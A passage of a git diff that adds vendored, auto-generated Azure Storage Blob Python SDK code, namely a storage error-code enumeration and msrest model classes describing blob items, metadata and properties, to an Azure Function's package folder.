MULTIPLE_CONDITION_HEADERS_NOT_SUPPORTED = "MultipleConditionHeadersNotSupported" + OPERATION_TIMED_OUT = "OperationTimedOut" + OUT_OF_RANGE_INPUT = "OutOfRangeInput" + OUT_OF_RANGE_QUERY_PARAMETER_VALUE = "OutOfRangeQueryParameterValue" + REQUEST_BODY_TOO_LARGE = "RequestBodyTooLarge" + RESOURCE_TYPE_MISMATCH = "ResourceTypeMismatch" + REQUEST_URL_FAILED_TO_PARSE = "RequestUrlFailedToParse" + RESOURCE_ALREADY_EXISTS = "ResourceAlreadyExists" + RESOURCE_NOT_FOUND = "ResourceNotFound" + SERVER_BUSY = "ServerBusy" + UNSUPPORTED_HEADER = "UnsupportedHeader" + UNSUPPORTED_XML_NODE = "UnsupportedXmlNode" + UNSUPPORTED_QUERY_PARAMETER = "UnsupportedQueryParameter" + UNSUPPORTED_HTTP_VERB = "UnsupportedHttpVerb" + APPEND_POSITION_CONDITION_NOT_MET = "AppendPositionConditionNotMet" + BLOB_ALREADY_EXISTS = "BlobAlreadyExists" + BLOB_IMMUTABLE_DUE_TO_POLICY = "BlobImmutableDueToPolicy" + BLOB_NOT_FOUND = "BlobNotFound" + BLOB_OVERWRITTEN = "BlobOverwritten" + BLOB_TIER_INADEQUATE_FOR_CONTENT_LENGTH = "BlobTierInadequateForContentLength" + BLOB_USES_CUSTOMER_SPECIFIED_ENCRYPTION = "BlobUsesCustomerSpecifiedEncryption" + BLOCK_COUNT_EXCEEDS_LIMIT = "BlockCountExceedsLimit" + BLOCK_LIST_TOO_LONG = "BlockListTooLong" + CANNOT_CHANGE_TO_LOWER_TIER = "CannotChangeToLowerTier" + CANNOT_VERIFY_COPY_SOURCE = "CannotVerifyCopySource" + CONTAINER_ALREADY_EXISTS = "ContainerAlreadyExists" + CONTAINER_BEING_DELETED = "ContainerBeingDeleted" + CONTAINER_DISABLED = "ContainerDisabled" + CONTAINER_NOT_FOUND = "ContainerNotFound" + CONTENT_LENGTH_LARGER_THAN_TIER_LIMIT = "ContentLengthLargerThanTierLimit" + COPY_ACROSS_ACCOUNTS_NOT_SUPPORTED = "CopyAcrossAccountsNotSupported" + COPY_ID_MISMATCH = "CopyIdMismatch" + FEATURE_VERSION_MISMATCH = "FeatureVersionMismatch" + INCREMENTAL_COPY_BLOB_MISMATCH = "IncrementalCopyBlobMismatch" + INCREMENTAL_COPY_OF_ERALIER_VERSION_SNAPSHOT_NOT_ALLOWED = "IncrementalCopyOfEralierVersionSnapshotNotAllowed" + INCREMENTAL_COPY_SOURCE_MUST_BE_SNAPSHOT = "IncrementalCopySourceMustBeSnapshot" + INFINITE_LEASE_DURATION_REQUIRED = "InfiniteLeaseDurationRequired" + INVALID_BLOB_OR_BLOCK = "InvalidBlobOrBlock" + INVALID_BLOB_TIER = "InvalidBlobTier" + INVALID_BLOB_TYPE = "InvalidBlobType" + INVALID_BLOCK_ID = "InvalidBlockId" + INVALID_BLOCK_LIST = "InvalidBlockList" + INVALID_OPERATION = "InvalidOperation" + INVALID_PAGE_RANGE = "InvalidPageRange" + INVALID_SOURCE_BLOB_TYPE = "InvalidSourceBlobType" + INVALID_SOURCE_BLOB_URL = "InvalidSourceBlobUrl" + INVALID_VERSION_FOR_PAGE_BLOB_OPERATION = "InvalidVersionForPageBlobOperation" + LEASE_ALREADY_PRESENT = "LeaseAlreadyPresent" + LEASE_ALREADY_BROKEN = "LeaseAlreadyBroken" + LEASE_ID_MISMATCH_WITH_BLOB_OPERATION = "LeaseIdMismatchWithBlobOperation" + LEASE_ID_MISMATCH_WITH_CONTAINER_OPERATION = "LeaseIdMismatchWithContainerOperation" + LEASE_ID_MISMATCH_WITH_LEASE_OPERATION = "LeaseIdMismatchWithLeaseOperation" + LEASE_ID_MISSING = "LeaseIdMissing" + LEASE_IS_BREAKING_AND_CANNOT_BE_ACQUIRED = "LeaseIsBreakingAndCannotBeAcquired" + LEASE_IS_BREAKING_AND_CANNOT_BE_CHANGED = "LeaseIsBreakingAndCannotBeChanged" + LEASE_IS_BROKEN_AND_CANNOT_BE_RENEWED = "LeaseIsBrokenAndCannotBeRenewed" + LEASE_LOST = "LeaseLost" + LEASE_NOT_PRESENT_WITH_BLOB_OPERATION = "LeaseNotPresentWithBlobOperation" + LEASE_NOT_PRESENT_WITH_CONTAINER_OPERATION = "LeaseNotPresentWithContainerOperation" + LEASE_NOT_PRESENT_WITH_LEASE_OPERATION = "LeaseNotPresentWithLeaseOperation" + MAX_BLOB_SIZE_CONDITION_NOT_MET = "MaxBlobSizeConditionNotMet" + NO_AUTHENTICATION_INFORMATION 
= "NoAuthenticationInformation" + NO_PENDING_COPY_OPERATION = "NoPendingCopyOperation" + OPERATION_NOT_ALLOWED_ON_INCREMENTAL_COPY_BLOB = "OperationNotAllowedOnIncrementalCopyBlob" + PENDING_COPY_OPERATION = "PendingCopyOperation" + PREVIOUS_SNAPSHOT_CANNOT_BE_NEWER = "PreviousSnapshotCannotBeNewer" + PREVIOUS_SNAPSHOT_NOT_FOUND = "PreviousSnapshotNotFound" + PREVIOUS_SNAPSHOT_OPERATION_NOT_SUPPORTED = "PreviousSnapshotOperationNotSupported" + SEQUENCE_NUMBER_CONDITION_NOT_MET = "SequenceNumberConditionNotMet" + SEQUENCE_NUMBER_INCREMENT_TOO_LARGE = "SequenceNumberIncrementTooLarge" + SNAPSHOT_COUNT_EXCEEDED = "SnapshotCountExceeded" + SNAPSHOT_OPERATION_RATE_EXCEEDED = "SnapshotOperationRateExceeded" + SNAPSHOTS_PRESENT = "SnapshotsPresent" + SOURCE_CONDITION_NOT_MET = "SourceConditionNotMet" + SYSTEM_IN_USE = "SystemInUse" + TARGET_CONDITION_NOT_MET = "TargetConditionNotMet" + UNAUTHORIZED_BLOB_OVERWRITE = "UnauthorizedBlobOverwrite" + BLOB_BEING_REHYDRATED = "BlobBeingRehydrated" + BLOB_ARCHIVED = "BlobArchived" + BLOB_NOT_ARCHIVED = "BlobNotArchived" + AUTHORIZATION_SOURCE_IP_MISMATCH = "AuthorizationSourceIPMismatch" + AUTHORIZATION_PROTOCOL_MISMATCH = "AuthorizationProtocolMismatch" + AUTHORIZATION_PERMISSION_MISMATCH = "AuthorizationPermissionMismatch" + AUTHORIZATION_SERVICE_MISMATCH = "AuthorizationServiceMismatch" + AUTHORIZATION_RESOURCE_TYPE_MISMATCH = "AuthorizationResourceTypeMismatch" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py new file mode 100644 index 0000000..172825c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py @@ -0,0 +1,2600 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from azure.core.exceptions import HttpResponseError +import msrest.serialization + + +class AccessPolicy(msrest.serialization.Model): + """An Access policy. + + :ivar start: the date-time the policy is active. + :vartype start: str + :ivar expiry: the date-time the policy expires. + :vartype expiry: str + :ivar permission: the permissions for the acl policy. + :vartype permission: str + """ + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + 'permission': {'key': 'Permission', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: the date-time the policy is active. + :paramtype start: str + :keyword expiry: the date-time the policy expires. + :paramtype expiry: str + :keyword permission: the permissions for the acl policy. + :paramtype permission: str + """ + super(AccessPolicy, self).__init__(**kwargs) + self.start = kwargs.get('start', None) + self.expiry = kwargs.get('expiry', None) + self.permission = kwargs.get('permission', None) + + +class AppendPositionAccessConditions(msrest.serialization.Model): + """Parameter group. 
+ + :ivar max_size: Optional conditional header. The max length in bytes permitted for the append + blob. If the Append Block operation would cause the blob to exceed that limit or if the blob + size is already greater than the value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype max_size: long + :ivar append_position: Optional conditional header, used only for the Append Block operation. A + number indicating the byte offset to compare. Append Block will succeed only if the append + position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype append_position: long + """ + + _attribute_map = { + 'max_size': {'key': 'maxSize', 'type': 'long'}, + 'append_position': {'key': 'appendPosition', 'type': 'long'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword max_size: Optional conditional header. The max length in bytes permitted for the + append blob. If the Append Block operation would cause the blob to exceed that limit or if the + blob size is already greater than the value specified in this header, the request will fail + with MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype max_size: long + :keyword append_position: Optional conditional header, used only for the Append Block + operation. A number indicating the byte offset to compare. Append Block will succeed only if + the append position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype append_position: long + """ + super(AppendPositionAccessConditions, self).__init__(**kwargs) + self.max_size = kwargs.get('max_size', None) + self.append_position = kwargs.get('append_position', None) + + +class ArrowConfiguration(msrest.serialization.Model): + """Groups the settings used for formatting the response if the response should be Arrow formatted. + + All required parameters must be populated in order to send to Azure. + + :ivar schema: Required. + :vartype schema: list[~azure.storage.blob.models.ArrowField] + """ + + _validation = { + 'schema': {'required': True}, + } + + _attribute_map = { + 'schema': {'key': 'Schema', 'type': '[ArrowField]', 'xml': {'name': 'Schema', 'wrapped': True, 'itemsName': 'Field'}}, + } + _xml_map = { + 'name': 'ArrowConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword schema: Required. + :paramtype schema: list[~azure.storage.blob.models.ArrowField] + """ + super(ArrowConfiguration, self).__init__(**kwargs) + self.schema = kwargs['schema'] + + +class ArrowField(msrest.serialization.Model): + """Groups settings regarding specific field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. + :vartype type: str + :ivar name: + :vartype name: str + :ivar precision: + :vartype precision: int + :ivar scale: + :vartype scale: int + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str'}, + 'name': {'key': 'Name', 'type': 'str'}, + 'precision': {'key': 'Precision', 'type': 'int'}, + 'scale': {'key': 'Scale', 'type': 'int'}, + } + _xml_map = { + 'name': 'Field' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword type: Required. 
+ :paramtype type: str + :keyword name: + :paramtype name: str + :keyword precision: + :paramtype precision: int + :keyword scale: + :paramtype scale: int + """ + super(ArrowField, self).__init__(**kwargs) + self.type = kwargs['type'] + self.name = kwargs.get('name', None) + self.precision = kwargs.get('precision', None) + self.scale = kwargs.get('scale', None) + + +class BlobFlatListSegment(msrest.serialization.Model): + """BlobFlatListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]'}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobFlatListSegment, self).__init__(**kwargs) + self.blob_items = kwargs['blob_items'] + + +class BlobHierarchyListSegment(msrest.serialization.Model): + """BlobHierarchyListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_prefixes: + :vartype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix'}}, + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_prefixes: + :paramtype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobHierarchyListSegment, self).__init__(**kwargs) + self.blob_prefixes = kwargs.get('blob_prefixes', None) + self.blob_items = kwargs['blob_items'] + + +class BlobHTTPHeaders(msrest.serialization.Model): + """Parameter group. + + :ivar blob_cache_control: Optional. Sets the blob's cache control. If specified, this property + is stored with the blob and returned with a read request. + :vartype blob_cache_control: str + :ivar blob_content_type: Optional. Sets the blob's content type. If specified, this property is + stored with the blob and returned with a read request. + :vartype blob_content_type: str + :ivar blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is not + validated, as the hashes for the individual blocks were validated when each was uploaded. + :vartype blob_content_md5: bytearray + :ivar blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_encoding: str + :ivar blob_content_language: Optional. Set the blob's content language. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_language: str + :ivar blob_content_disposition: Optional. Sets the blob's Content-Disposition header. 
+ :vartype blob_content_disposition: str
+ """
+
+ _attribute_map = {
+ 'blob_cache_control': {'key': 'blobCacheControl', 'type': 'str'},
+ 'blob_content_type': {'key': 'blobContentType', 'type': 'str'},
+ 'blob_content_md5': {'key': 'blobContentMD5', 'type': 'bytearray'},
+ 'blob_content_encoding': {'key': 'blobContentEncoding', 'type': 'str'},
+ 'blob_content_language': {'key': 'blobContentLanguage', 'type': 'str'},
+ 'blob_content_disposition': {'key': 'blobContentDisposition', 'type': 'str'},
+ }
+
+ def __init__(
+ self,
+ **kwargs
+ ):
+ """
+ :keyword blob_cache_control: Optional. Sets the blob's cache control. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_cache_control: str
+ :keyword blob_content_type: Optional. Sets the blob's content type. If specified, this property
+ is stored with the blob and returned with a read request.
+ :paramtype blob_content_type: str
+ :keyword blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is
+ not validated, as the hashes for the individual blocks were validated when each was uploaded.
+ :paramtype blob_content_md5: bytearray
+ :keyword blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_content_encoding: str
+ :keyword blob_content_language: Optional. Set the blob's content language. If specified, this
+ property is stored with the blob and returned with a read request.
+ :paramtype blob_content_language: str
+ :keyword blob_content_disposition: Optional. Sets the blob's Content-Disposition header.
+ :paramtype blob_content_disposition: str
+ """
+ super(BlobHTTPHeaders, self).__init__(**kwargs)
+ self.blob_cache_control = kwargs.get('blob_cache_control', None)
+ self.blob_content_type = kwargs.get('blob_content_type', None)
+ self.blob_content_md5 = kwargs.get('blob_content_md5', None)
+ self.blob_content_encoding = kwargs.get('blob_content_encoding', None)
+ self.blob_content_language = kwargs.get('blob_content_language', None)
+ self.blob_content_disposition = kwargs.get('blob_content_disposition', None)
+
+
+ class BlobItemInternal(msrest.serialization.Model):
+ """An Azure Storage blob.
+
+ All required parameters must be populated in order to send to Azure.
+
+ :ivar name: Required.
+ :vartype name: ~azure.storage.blob.models.BlobName
+ :ivar deleted: Required.
+ :vartype deleted: bool
+ :ivar snapshot: Required.
+ :vartype snapshot: str
+ :ivar version_id:
+ :vartype version_id: str
+ :ivar is_current_version:
+ :vartype is_current_version: bool
+ :ivar properties: Required. Properties of a blob.
+ :vartype properties: ~azure.storage.blob.models.BlobPropertiesInternal
+ :ivar metadata:
+ :vartype metadata: ~azure.storage.blob.models.BlobMetadata
+ :ivar blob_tags: Blob tags.
+ :vartype blob_tags: ~azure.storage.blob.models.BlobTags
+ :ivar has_versions_only:
+ :vartype has_versions_only: bool
+ :ivar object_replication_metadata: Dictionary of :code:`<string>`.
+ :vartype object_replication_metadata: dict[str, str]
+ """
+
+ _validation = {
+ 'name': {'required': True},
+ 'deleted': {'required': True},
+ 'snapshot': {'required': True},
+ 'properties': {'required': True},
+ }
+
+ _attribute_map = {
+ 'name': {'key': 'Name', 'type': 'BlobName'},
+ 'deleted': {'key': 'Deleted', 'type': 'bool'},
+ 'snapshot': {'key': 'Snapshot', 'type': 'str'},
+ 'version_id': {'key': 'VersionId', 'type': 'str'},
+ 'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool'},
+ 'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal'},
+ 'metadata': {'key': 'Metadata', 'type': 'BlobMetadata'},
+ 'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags'},
+ 'has_versions_only': {'key': 'HasVersionsOnly', 'type': 'bool'},
+ 'object_replication_metadata': {'key': 'OrMetadata', 'type': '{str}'},
+ }
+ _xml_map = {
+ 'name': 'Blob'
+ }
+
+ def __init__(
+ self,
+ **kwargs
+ ):
+ """
+ :keyword name: Required.
+ :paramtype name: ~azure.storage.blob.models.BlobName
+ :keyword deleted: Required.
+ :paramtype deleted: bool
+ :keyword snapshot: Required.
+ :paramtype snapshot: str
+ :keyword version_id:
+ :paramtype version_id: str
+ :keyword is_current_version:
+ :paramtype is_current_version: bool
+ :keyword properties: Required. Properties of a blob.
+ :paramtype properties: ~azure.storage.blob.models.BlobPropertiesInternal
+ :keyword metadata:
+ :paramtype metadata: ~azure.storage.blob.models.BlobMetadata
+ :keyword blob_tags: Blob tags.
+ :paramtype blob_tags: ~azure.storage.blob.models.BlobTags
+ :keyword has_versions_only:
+ :paramtype has_versions_only: bool
+ :keyword object_replication_metadata: Dictionary of :code:`<string>`.
+ :paramtype object_replication_metadata: dict[str, str]
+ """
+ super(BlobItemInternal, self).__init__(**kwargs)
+ self.name = kwargs['name']
+ self.deleted = kwargs['deleted']
+ self.snapshot = kwargs['snapshot']
+ self.version_id = kwargs.get('version_id', None)
+ self.is_current_version = kwargs.get('is_current_version', None)
+ self.properties = kwargs['properties']
+ self.metadata = kwargs.get('metadata', None)
+ self.blob_tags = kwargs.get('blob_tags', None)
+ self.has_versions_only = kwargs.get('has_versions_only', None)
+ self.object_replication_metadata = kwargs.get('object_replication_metadata', None)
+
+
+ class BlobMetadata(msrest.serialization.Model):
+ """BlobMetadata.
+
+ :ivar additional_properties: Unmatched properties from the message are deserialized to this
+ collection.
+ :vartype additional_properties: dict[str, str]
+ :ivar encrypted:
+ :vartype encrypted: str
+ """
+
+ _attribute_map = {
+ 'additional_properties': {'key': '', 'type': '{str}'},
+ 'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'attr': True}},
+ }
+ _xml_map = {
+ 'name': 'Metadata'
+ }
+
+ def __init__(
+ self,
+ **kwargs
+ ):
+ """
+ :keyword additional_properties: Unmatched properties from the message are deserialized to this
+ collection.
+ :paramtype additional_properties: dict[str, str]
+ :keyword encrypted:
+ :paramtype encrypted: str
+ """
+ super(BlobMetadata, self).__init__(**kwargs)
+ self.additional_properties = kwargs.get('additional_properties', None)
+ self.encrypted = kwargs.get('encrypted', None)
+
+
+ class BlobName(msrest.serialization.Model):
+ """BlobName.
+
+ :ivar encoded: Indicates if the blob name is encoded.
+ :vartype encoded: bool
+ :ivar content: The name of the blob.
+ :vartype content: str + """ + + _attribute_map = { + 'encoded': {'key': 'Encoded', 'type': 'bool', 'xml': {'name': 'Encoded', 'attr': True}}, + 'content': {'key': 'content', 'type': 'str', 'xml': {'text': True}}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword encoded: Indicates if the blob name is encoded. + :paramtype encoded: bool + :keyword content: The name of the blob. + :paramtype content: str + """ + super(BlobName, self).__init__(**kwargs) + self.encoded = kwargs.get('encoded', None) + self.content = kwargs.get('content', None) + + +class BlobPrefix(msrest.serialization.Model): + """BlobPrefix. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + """ + + _validation = { + 'name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + """ + super(BlobPrefix, self).__init__(**kwargs) + self.name = kwargs['name'] + + +class BlobPropertiesInternal(msrest.serialization.Model): + """Properties of a blob. + + All required parameters must be populated in order to send to Azure. + + :ivar creation_time: + :vartype creation_time: ~datetime.datetime + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar content_length: Size in bytes. + :vartype content_length: long + :ivar content_type: + :vartype content_type: str + :ivar content_encoding: + :vartype content_encoding: str + :ivar content_language: + :vartype content_language: str + :ivar content_md5: + :vartype content_md5: bytearray + :ivar content_disposition: + :vartype content_disposition: str + :ivar cache_control: + :vartype cache_control: str + :ivar blob_sequence_number: + :vartype blob_sequence_number: long + :ivar blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :vartype blob_type: str or ~azure.storage.blob.models.BlobType + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar copy_id: + :vartype copy_id: str + :ivar copy_status: Possible values include: "pending", "success", "aborted", "failed". + :vartype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :ivar copy_source: + :vartype copy_source: str + :ivar copy_progress: + :vartype copy_progress: str + :ivar copy_completion_time: + :vartype copy_completion_time: ~datetime.datetime + :ivar copy_status_description: + :vartype copy_status_description: str + :ivar server_encrypted: + :vartype server_encrypted: bool + :ivar incremental_copy: + :vartype incremental_copy: bool + :ivar destination_snapshot: + :vartype destination_snapshot: str + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". 
+ :vartype access_tier: str or ~azure.storage.blob.models.AccessTier + :ivar access_tier_inferred: + :vartype access_tier_inferred: bool + :ivar archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :vartype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :ivar customer_provided_key_sha256: + :vartype customer_provided_key_sha256: str + :ivar encryption_scope: The name of the encryption scope under which the blob is encrypted. + :vartype encryption_scope: str + :ivar access_tier_change_time: + :vartype access_tier_change_time: ~datetime.datetime + :ivar tag_count: + :vartype tag_count: int + :ivar expires_on: + :vartype expires_on: ~datetime.datetime + :ivar is_sealed: + :vartype is_sealed: bool + :ivar rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :vartype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :ivar last_accessed_on: + :vartype last_accessed_on: ~datetime.datetime + :ivar immutability_policy_expires_on: + :vartype immutability_policy_expires_on: ~datetime.datetime + :ivar immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :vartype immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :ivar legal_hold: + :vartype legal_hold: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123'}, + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'content_length': {'key': 'Content-Length', 'type': 'long'}, + 'content_type': {'key': 'Content-Type', 'type': 'str'}, + 'content_encoding': {'key': 'Content-Encoding', 'type': 'str'}, + 'content_language': {'key': 'Content-Language', 'type': 'str'}, + 'content_md5': {'key': 'Content-MD5', 'type': 'bytearray'}, + 'content_disposition': {'key': 'Content-Disposition', 'type': 'str'}, + 'cache_control': {'key': 'Cache-Control', 'type': 'str'}, + 'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long'}, + 'blob_type': {'key': 'BlobType', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'copy_id': {'key': 'CopyId', 'type': 'str'}, + 'copy_status': {'key': 'CopyStatus', 'type': 'str'}, + 'copy_source': {'key': 'CopySource', 'type': 'str'}, + 'copy_progress': {'key': 'CopyProgress', 'type': 'str'}, + 'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123'}, + 'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str'}, + 'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool'}, + 'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool'}, + 'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'access_tier': {'key': 'AccessTier', 'type': 'str'}, + 'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool'}, + 'archive_status': {'key': 'ArchiveStatus', 'type': 'str'}, + 'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str'}, + 'encryption_scope': {'key': 
'EncryptionScope', 'type': 'str'}, + 'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123'}, + 'tag_count': {'key': 'TagCount', 'type': 'int'}, + 'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123'}, + 'is_sealed': {'key': 'Sealed', 'type': 'bool'}, + 'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str'}, + 'last_accessed_on': {'key': 'LastAccessTime', 'type': 'rfc-1123'}, + 'immutability_policy_expires_on': {'key': 'ImmutabilityPolicyUntilDate', 'type': 'rfc-1123'}, + 'immutability_policy_mode': {'key': 'ImmutabilityPolicyMode', 'type': 'str'}, + 'legal_hold': {'key': 'LegalHold', 'type': 'bool'}, + } + _xml_map = { + 'name': 'Properties' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword creation_time: + :paramtype creation_time: ~datetime.datetime + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword content_length: Size in bytes. + :paramtype content_length: long + :keyword content_type: + :paramtype content_type: str + :keyword content_encoding: + :paramtype content_encoding: str + :keyword content_language: + :paramtype content_language: str + :keyword content_md5: + :paramtype content_md5: bytearray + :keyword content_disposition: + :paramtype content_disposition: str + :keyword cache_control: + :paramtype cache_control: str + :keyword blob_sequence_number: + :paramtype blob_sequence_number: long + :keyword blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :paramtype blob_type: str or ~azure.storage.blob.models.BlobType + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword copy_id: + :paramtype copy_id: str + :keyword copy_status: Possible values include: "pending", "success", "aborted", "failed". + :paramtype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :keyword copy_source: + :paramtype copy_source: str + :keyword copy_progress: + :paramtype copy_progress: str + :keyword copy_completion_time: + :paramtype copy_completion_time: ~datetime.datetime + :keyword copy_status_description: + :paramtype copy_status_description: str + :keyword server_encrypted: + :paramtype server_encrypted: bool + :keyword incremental_copy: + :paramtype incremental_copy: bool + :keyword destination_snapshot: + :paramtype destination_snapshot: str + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :paramtype access_tier: str or ~azure.storage.blob.models.AccessTier + :keyword access_tier_inferred: + :paramtype access_tier_inferred: bool + :keyword archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". 
+ :paramtype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :keyword customer_provided_key_sha256: + :paramtype customer_provided_key_sha256: str + :keyword encryption_scope: The name of the encryption scope under which the blob is encrypted. + :paramtype encryption_scope: str + :keyword access_tier_change_time: + :paramtype access_tier_change_time: ~datetime.datetime + :keyword tag_count: + :paramtype tag_count: int + :keyword expires_on: + :paramtype expires_on: ~datetime.datetime + :keyword is_sealed: + :paramtype is_sealed: bool + :keyword rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :paramtype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :keyword last_accessed_on: + :paramtype last_accessed_on: ~datetime.datetime + :keyword immutability_policy_expires_on: + :paramtype immutability_policy_expires_on: ~datetime.datetime + :keyword immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :paramtype immutability_policy_mode: str or + ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :keyword legal_hold: + 